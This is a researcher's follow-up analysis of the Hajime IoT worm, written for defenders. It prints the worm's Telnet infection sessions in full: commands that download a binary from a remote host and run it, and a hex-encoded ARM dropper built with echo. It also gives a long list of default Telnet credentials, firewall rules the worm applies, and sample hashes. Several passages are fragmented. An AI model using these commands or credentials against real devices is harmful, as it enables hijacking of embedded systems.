Hajime: A follow-up

Hajime is a decentralized modular worm that targets embedded devices with Telnet exposed to the internet.

Its binaries are built for Linux devices with ARMv5, ARMv6, ARMv7, MIPS little-endian and MIPS big-endian processor architectures.

It was originally discovered by Sam Edwards and I of Rapidity Networks SRG, and its behaviour was outlined in a paper that can be found here.

Ever since the release of the aforementioned paper on October 16th of 2016, there has been a series of changes as to how Hajime operates.

nc; wget; /bin/busybox UXVMW

And checking its output for the strings “wget: applet not found” or “wget: not found”.

The request URI is always /.i:

rm .s; wget http://x.x.x.x:10363/.i; chmod +x .i; ./.i; exit
HTTP/1.0 200 OK
Content-Type: application/octet-stream
Content-Length: *size of stage2*


On Arris devices, the attempted commands are (in respective order):

ping ; sh

The latter has also been observed to be in use by LuaBot (see here: https://w00tsec.blogspot.com/2016/09/luabot-malware-targeting-cable-modems.html)

Username Password
root xc3511
root vizxv
root admin
admin admin
root 888888
root xmhdipc
root default
root juantech
root 123456
root 54321
support support
admin password
root root
root 12345
user user
root pass
admin admin1234
root 1111
admin smcadmin
admin 1111
root 666666
root password
root 1234
root klv123
Administrator admin
service service
supervisor supervisor
guest guest
guest 12345
admin1 password
administrator 1234
666666 666666
888888 888888
ubnt ubnt
root klv1234
root Zte521
root hi3518
root jvbzd
root anko
root zlxx.
root 7ujMko0vizxv
root 7ujMko0admin
root system
root ikwb
root dreambox
root user
root realtek
root 00000000
admin 1111111
admin 1234
admin 12345
admin 54321
admin 123456
admin 7ujMko0admin
admin 1234
admin pass
admin meinsm
tech tech
mother fucker
root 5up
Admin 5up
iptables -A INPUT -p tcp --destination-port 23 -j DROP
iptables -A INPUT -p tcp --destination-port 7547 -j DROP
iptables -A INPUT -p tcp --destination-port 5555 -j DROP
iptables -A INPUT -p tcp --destination-port 5358 -j DROP

It also attempts to drop an INPUT chain named “CWMP_CR”:

iptables -D INPUT -j CWMP_CR
iptables -X CWMP_CR
Just a white hat, securing some systems.

Important messages will be signed like this!

Hajime Author.

Contact CLOSED

Stay sharp!
ping ; sh
cat /proc/mounts; /bin/busybox PSLQP
cd /var; (cat .s || cp /bin/echo .s); /bin/busybox PSLQP
nc; wget; /bin/busybox PSLQP
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PSLQP
>.s; cp .s .i
echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\x00\x54\x00\x01\x00\x34\x00\x00\x00\x40\x01\x00\x00\x00\x02\x00\x05\x34\x00\x20\x00\x01\x00\x28\x00\x04\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" >> .s
echo -ne "\x00\x00\x01\x00\xf8\x00\x00\x00\xf8\x00\x00\x00\x05\x00\x00\x00\x00\x00\x01\x00\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x06\x20\xa0\xe3\x07\x00\x2d\xe9\x01\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x0c\xd0\x8d\xe2\x00\x60\xa0\xe1\x70\x10\x8f\xe2\x10\x20\xa0\xe3" >> .s
echo -ne "\x07\x00\x2d\xe9\x03\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x14\xd0\x8d\xe2\x4f\x4f\x4d\xe2\x05\x50\x45\xe0\x06\x00\xa0\xe1\x04\x10\xa0\xe1\x4b\x2f\xa0\xe3\x01\x3c\xa0\xe3\x0f\x00\x2d\xe9\x0a\x00\xa0\xe3\x0d\x10\xa0\xe1\x66\x00\x90\xef\x10\xd0\x8d\xe2" >> .s
echo -ne "\x00\x50\x85\xe0\x00\x00\x50\xe3\x04\x00\x00\xda\x00\x20\xa0\xe1\x01\x00\xa0\xe3\x04\x10\xa0\xe1\x04\x00\x90\xef\xee\xff\xff\xea\x4f\xdf\x8d\xe2\x00\x00\x40\xe0\x01\x70\xa0\xe3\x00\x00\x00\xef\x02\x00\x9f\xc8\x05\x28\xcf\x1d\x41\x26\x00\x00\x00\x61\x65\x61" >> .s
echo -ne "\x62\x69\x00\x01\x1c\x00\x00\x00\x05\x43\x6f\x72\x74\x65\x78\x2d\x41\x35\x00\x06\x0a\x07\x41\x08\x01\x09\x02\x2a\x01\x44\x01\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x00" >> .s
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x54\x00\x01\x00\x54\x00\x00\x00\xa4\x00\x00\x00" >> .s
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x70\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x27\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00" >> .s
echo -ne "\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x01\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" >> .s
./.s>.i; chmod +x .i; ./.i; rm .s; exit
ping ; sh
cat /proc/mounts; /bin/busybox UXVMW
cd /var; (cat .s || cp /bin/echo .s); /bin/busybox UXVMW
nc; wget; /bin/busybox UXVMW
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox UXVMW
rm .s; wget http://x.x.x.x:10363/.i; chmod +x .i; ./.i; exit

Note that the first line on both sessions is the Arris password-of-the-day for April 13th, 2017.

File name: .i.arm7.1485239580
MD5:		2e9dd2e43e866a26c44ceccc129e0c52
SHA1:		c2b82c322cfd0f61d234267a99bb848898fe54ea
SHA256:		e3a4120c1f2ec3d430ad95f567179280d657739dd906053d0e9b6d45d59ffa93
SHA512:		74e160a752517fcc28c49efbb326689197d2b2f7bd7c365aaaed511c2e9565c90509b61520b9a117bafae24f653ca62e6b686c51d464ce2b77e8be2b4a5217a6

File name: atk.arm7.1485239515
MD5:		359779e208d59d84a9b58a278be5345b
SHA1:		14ac6ea9736ae013071995dff535c34ebb411143
SHA256:		c02cb27fee760a29d990cecfb029b64aa2abbc349fa2a9c17b2438add3af4da0
SHA512:		9e4e8be435613f08380d057e4d0cf0532308c69e82fe9fe9c951d47b65ac4166db83cafe043617d474fb07b9d1b43c3ac08c9db3ebb8d0bcb8688d96181b1faf

A repository containing the filenames and hashes of all known Hajime configurations and binaries can be found at https://github.com/Psychotropos/hajime_hashes.

Samples are also automatically submitted to VirusTotal for analysis: https://www.virustotal.com/en/user/psychotropos/